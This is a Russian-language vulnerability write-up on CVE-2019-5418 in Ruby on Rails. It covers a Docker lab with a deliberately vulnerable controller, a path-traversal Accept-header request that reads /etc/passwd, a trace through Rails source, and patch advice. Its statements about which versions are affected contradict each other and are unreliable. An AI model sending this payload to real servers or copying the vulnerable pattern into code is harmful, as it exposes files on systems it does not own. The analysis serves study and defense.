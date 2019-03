Ты наверняка в курсе, что такое Ruby on Rails, если когда-нибудь сталкивался с веб-девом. Этот фреймворк в свое время захватил умы разработчиков и успешно применяется до сих пор. Любая уязвимость в нем означает огромное количество потенциальных целей. В этот раз мы посмотрим, как недавно найденный баг позволяет читать любые файлы на целевой системе.

Уязвимость имеет номер CVE-2019-5418 и заключается в раскрытии содержимого файла в компоненте ActionView. Специально сформированные заголовки Accept при выполнении контроллеров, в которых имеются конструкции render file: , могут привести к чтению произвольных файлов на целевой системе. Уязвимы версии Ruby on Rails до 5.2.1.

Стенд

Демонстрацию уязвимости начинаем с конструирования стенда. Возьмем обычный контейнер Docker с Debian.

$ docker run --rm -p3000:3000 -ti --name=rails --hostname=rails debian /bin/bash

Устанавливаем Ruby, Bundler и некоторые зависимости.

$ apt-get -y update && apt-get install -y ruby bundler libsqlite3-dev zlibc zlib1g zlib1g-dev

Теперь установим фреймворк Rails уязвимой версии, например 5.2.1.

$ gem install rails -v 5.2.1

Далее нужно создать папку для тестового проекта, а в ней Gemfile — это список того, какие гемы и каких версий нужны разрабатываемому проекту.

$ mkdir ~/test && cd "$_" $ echo "source 'https://rubygems.org'" >> Gemfile $ echo "gem 'rails', '5.2.1'" >> Gemfile $ echo "gem 'sqlite3', '~> 1.3.6', '< 1.4'" >> Gemfile

Теперь скачаем и установим все это дело.

$ bundle install

После этих манипуляций нужно создать приложение Rails из стандартного шаблона.

$ rails new . --force --skip-bundle

И снова установим необходимые гемы при помощи Bundle.

$ bundle install

Приложение готово, и можно запустить веб-сервер, чтобы проверить его работу.

$ rails s

Если все работает нормально, то создаем новый контроллер. Назовем его vuln .

$ rails generate controller vuln

Фреймворк создаст необходимые файлы в директории с проектом. Откроем сам код контроллера app/controllers/vuln_controller.rb и добавим в него уязвимый код.

app/controllers/vuln_controller.rb

class VulnController < ApplicationController def index render file: "#{Rails.root}/hello" end end

В качестве представления (view) можно указать путь до любого файла. Я создал файл hello в корне проекта с содержимым «Hi there!».

Также нужно отредактировать файл с роутами config/routes.rb и прописать там имя нашего контроллера.

config/routes.rb

Rails.application.routes.draw do resources :vuln end

Снова запустим веб-сервер.

Если теперь ты перейдешь по URI /vuln , то увидишь строчку Hi there! из файла hello . Стенд готов.

Если тебя интересует отладка, то можешь воспользоваться удаленной (c некоторыми ограничениями). Я для этого возьму IDE RubyMine.

При запуске Docker нужно открыть еще один порт для подключения отладчика.

$ docker run --rm -p3000:3000 -p1234:1234 -ti --name=rails --hostname=rails debian /bin/bash

Затем нужно установить на обоих машинах гемы для дебага. Следи, чтобы они были одинаковых версий.

$ gem install ruby-debug-ide -v 0.7.0.beta7 $ gem install debase -v 0.2.3.beta5

Копируем проект на локальную машину, открываем его в RubyMine и добавляем конфигурацию удаленной отладки.

Указываем необходимые настройки. Обрати внимание на локальный и удаленный пути до проекта.

В поле Server command находится команда, которую нужно выполнить на сервере, чтобы начать слушать порт и ждать подключения отладчика. Вместо $COMMAND$ указываем строку для запуска сервера.

$ rdebug-ide --host 0.0.0.0 --port 1234 --dispatcher-port 26162 -- bin/rails s -b '0.0.0.0'

Теперь можно расставлять брейк-пойнты и наслаждаться отладкой.

Также никто не мешает отлаживать на этой же машине, вообще не используя Docker.

Детали

В этот раз начнем сразу с эксплоита, так как он очень прост. Нужно отправить запрос на уязвимый роут и указать в качестве заголовка Accept конструкцию c path traversal и {{ в конце.

GET /vuln HTTP/1.1 Host: rails.vh:3000 Connection: close Accept: ../../../../../../../../../../etc/passwd{{

В ответ получишь содержимое файла /etc/passwd .

Теперь разберемся, что приводит к такому печальному поведению. Скачиваем исходники этой версии Rails.

Метод render может использовать в качестве представления файлы, которые находятся за пределами директории разрабатываемого приложения. Заглянем в файл template_renderer.rb . При обработке опции file вызывается метод find_file , чтобы определить, какой шаблон будет отображен.

/actionview/lib/action_view/renderer/template_renderer.rb

05: module ActionView 06: class TemplateRenderer < AbstractRenderer #:nodoc: 07: def render(context, options) 08: @view = context 09: @details = extract_details(options) 10: template = determine_template(options) ... 22: def determine_template(options) ... 25: if options.key?(:body) ... 31: elsif options.key?(:file) 32: with_fallbacks { find_file(options[:file], nil, false, keys, @details) }

Посмотрим в тело метода.

/actionview/lib/action_view/lookup_context.rb

008: module ActionView ... 016: class LookupContext #:nodoc: ... 106: module ViewPaths 107: attr_reader :view_paths, :html_fallback_for_js ... 120: def find_file(name, prefixes = [], partial = false, keys = [], options = {}) 121: @view_paths.find_file(*args_for_lookup(name, prefixes, partial, keys, options)) 122: end

Далее args_for_lookup генерирует опции, которые необходимы для рендеринга вида.

/actionview/lib/action_view/lookup_context.rb

154: def args_for_lookup(name, prefixes, partial, keys, details_options) 155: name, prefixes = normalize_name(name, prefixes) 156: details, details_key = detail_args_for(details_options) 157: [name, prefixes, partial || false, details, details_key, keys] 158: end

После выполнения этого куска кода данные из заголовка Accept оказываются в переменной details[format] .

Затем вызывается @view_paths.find_file .

/actionview/lib/action_view/path_set.rb

03: module ActionView #:nodoc: ... 11: class PathSet #:nodoc: ... 51: def find_file(path, prefixes = [], *args) 52: _find_all(path, prefixes, args, true).first || raise(MissingTemplate.new(self, path, prefixes, *args)) 53: end ... 74: def _find_all(path, prefixes, args, outside_app) 75: prefixes = [prefixes] if String === prefixes 76: prefixes.each do |prefix| 77: paths.each do |resolver| 78: if outside_app 79: templates = resolver.find_all_anywhere(path, prefix, *args) ... 82: end 83: return templates unless templates.empty? 84: end 85: end 86: [] 87: end

Файл находится за пределами директории приложения (app), поэтому переменная outside_app установлена в значение True и будет вызван метод find_all_anywhere .

/actionview/lib/action_view/template/resolver.rb

010: module ActionView 011: # = Action View Resolver 012: class Resolver 013: # Keeps all information about view path and builds virtual path. 014: class Path ... 151: def find_all_anywhere(name, prefix, partial = false, details = {}, key = nil, locals = []) 152: cached(key, [name, prefix, partial], details, locals) do 153: find_templates(name, prefix, partial, details, true) 154: end 155: end

Далее вызов find_templates начинает процесс генерации пути до файла представления.

/actionview/lib/action_view/template/resolver.rb

207: class PathResolver < Resolver #:nodoc: 208: EXTENSIONS = { locale: ".", formats: ".", variants: "+", handlers: "." } 209: DEFAULT_PATTERN = ":prefix/:action{.:locale,}{.:formats,}{+:variants,}{.:handlers,}" 210: 211: def initialize(pattern = nil) 212: @pattern = pattern || DEFAULT_PATTERN 213: super() 214: end ... 218: def find_templates(name, prefix, partial, details, outside_app_allowed = false) 219: path = Path.build(name, prefix, partial) 220: query(path, details, details[:formats], outside_app_allowed) 221: end

Обрати внимание на дефолтный паттерн (строка 209).

:prefix/:action{.:locale,}{.:formats,}{+:variants,}{.:handlers,}

Если ты легитимно обращаешься к /vuln , то готовый паттерн будет выглядеть примерно так:

hello{.{en}.}{.{.},}{+{},}{.{raw,erb,html,builder,ruby,coffee,jbuilder},}

В процессе вызывается метод query , в качестве аргументов отправляется наша переменная details[:formats] .

223: def query(path, details, formats, outside_app_allowed) 224: query = build_query(path, details) 225: 226: template_paths = find_template_paths(query) ... 239: end 240: end

Здесь в build_query формируется шаблон поиска пути, из которого будет подгружен файл вида.

/actionview/lib/action_view/template/resolver.rb

261: def build_query(path, details) 262: query = @pattern.dup 263: 264: prefix = path.prefix.empty? ? "" : "#{escape_entry(path.prefix)}\\1" 265: query.gsub!(/:prefix(\/)?/, prefix) 266: 267: partial = escape_entry(path.partial? ? "_#{path.name}" : path.name) 268: query.gsub!(/:action/, partial) 269: 270: details.each do |ext, candidates| 271: if ext == :variants && candidates == :any 272: query.gsub!(/:#{ext}/, "*") 273: else 274: query.gsub!(/:#{ext}/, "{#{candidates.compact.uniq.join(',')}}") 275: end 276: end 277: 278: File.expand_path(query, @path) 279: end

Благодаря тому что переменная details[formats] никак не фильтруется, атакующий имеет возможность внедрять произвольную строку в формат поиска файла представления. Используя конструкции ../ , мы осуществляем выход из директории и добираемся до пути /etc/passwd , а две фигурные скобки в конце строки добавляем для того, чтобы конструкция получилась валидная. Таким образом, мы как бы расширяем дефолтный паттерн. В итоге, после того как отработает File.expand_path , строка для поиска файла вида будет иметь вид

/root/testapp/app/views/root/testapp/hello{.en,}{.../../../../../../../../../../etc/passwd{{,}{}{.raw,.erb,.html,.builder,.ruby,.coffee,.jbuilder,}

Дальше методы render_template и render_with_layout делают свое дело и загружают содержимое файла passwd во время рендеринга.

/actionview/lib/action_view/renderer/template_renderer.rb

49: def render_template(template, layout_name = nil, locals = nil) 50: view, locals = @view, locals || {} 51: 52: render_with_layout(layout_name, locals) do |layout|

/actionview/lib/action_view/renderer/template_renderer.rb

59: def render_with_layout(path, locals) 60: layout = path && find_layout(path, locals.keys, [formats.first]) 61: content = yield(layout) 62: 63: if layout 64: view = @view 65: view.view_flow.set(:layout, content) 66: layout.render(view, locals) { |*name| view._layout_for(*name) } 67: else 68: content 69: end 70: end

Эксплуатация успешно завершена.

Демонстрация уязвимости (видео)

Выводы

Вот такая банальная и одновременно опасная уязвимость. Советую проверить свои проекты на наличие конструкций вида render file: , и, если они имеются, надо менять логику.

И советую обновить Rails до последних версий, если приложение это позволяет. Разработчики быстро отреагировали и выпустили патч для устранения этой уязвимости, так что версии 5.2.1 и старше ее лишены.